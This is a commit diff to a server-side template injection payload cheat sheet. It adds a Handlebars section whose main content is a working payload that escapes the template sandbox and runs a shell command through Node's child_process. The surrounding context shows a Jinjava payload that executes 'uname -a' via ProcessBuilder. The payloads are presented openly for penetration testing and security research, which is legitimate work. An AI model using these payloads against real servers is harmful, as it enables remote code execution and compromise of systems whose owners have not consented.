parent
cc95f4e386
commit
76e6f7dc95
|
@ -44,6 +44,7 @@
|
|||
* [Jinjava](#jinjava)
|
||||
* [Basic injection](#basic-injection)
|
||||
* [Command execution](#command-execution)
|
||||
* [Handlebars](#handlebars)
|
||||
* [ASP.NET Razor](#aspnet-razor)
|
||||
* [Basic injection](#basic-injection)
|
||||
* [Command execution](#command-execution)
|
||||
|
@ -476,6 +477,37 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
|||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||
```
|
||||
|
||||
## Handlebars
|
||||
|
||||
### Command Execution
|
||||
|
||||
```handlebars
|
||||
{{#with "s" as |string|}}
|
||||
{{#with "e"}}
|
||||
{{#with split as |conslist|}}
|
||||
{{this.pop}}
|
||||
{{this.push (lookup string.sub "constructor")}}
|
||||
{{this.pop}}
|
||||
{{#with string.split as |codelist|}}
|
||||
{{this.pop}}
|
||||
{{this.push "return require('child_process').execSync('ls -la');"}}
|
||||
{{this.pop}}
|
||||
{{#each conslist}}
|
||||
{{#with (string.sub.apply 0 codelist)}}
|
||||
{{this}}
|
||||
{{/with}}
|
||||
{{/each}}
|
||||
{{/with}}
|
||||
{{/with}}
|
||||
{{/with}}
|
||||
{{/with}}
|
||||
```
|
||||
|
||||
### References
|
||||
|
||||
- [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
|
||||
- [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
|
||||
|
||||
## ASP.NET Razor
|
||||
|
||||
### Basic injection
|
||||
|
@ -510,4 +542,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
|||
* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
|
||||
* [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection)
|
||||
* [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE)
|
||||
* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
|
||||
* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
|
||||
|
|
Loading…
Reference in New Issue